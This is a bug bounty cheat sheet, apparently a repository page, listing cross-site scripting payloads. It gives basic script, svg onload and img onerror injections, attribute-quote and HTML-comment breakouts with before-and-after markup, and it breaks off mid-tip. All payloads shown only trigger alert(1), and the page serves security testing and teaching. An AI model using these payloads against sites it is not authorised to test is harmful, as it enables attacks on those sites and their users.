AllAboutBugBounty/XSS.md
Muhammad Daffa 74b4c4b2eb
XSS [4]
Add 3 tips
2020-09-14 10:38:20 +07:00

4.4 KiB

XSS Payloads

  1. Basic payload
<script>alert(1)</script>
<svg/onload=alert(1)>
<img src=x onerror=alert(1)>
  1. Add ' or " to escape the payload from value of an HTML tag
"><script>alert(1)</script>
'><script>alert(1)</script> 
  • Example source code
<input id="keyword" type="text" name="q" value="REFLECTED_HERE">
  • After input the payload
<input id="keyword" type="text" name="q" value=""><script>alert(1)</script>
  1. Add --> to escape the payload if input lands in HTML comments.
--><script>alert(1)</script>
  • Example source code
<!-- REFLECTED_HERE --> 
  • After input the payload
<!-- --><script>alert(1)</script> -->
  1. Add when the input inside or between opening/closing tags, tag can be ,<title, when input inside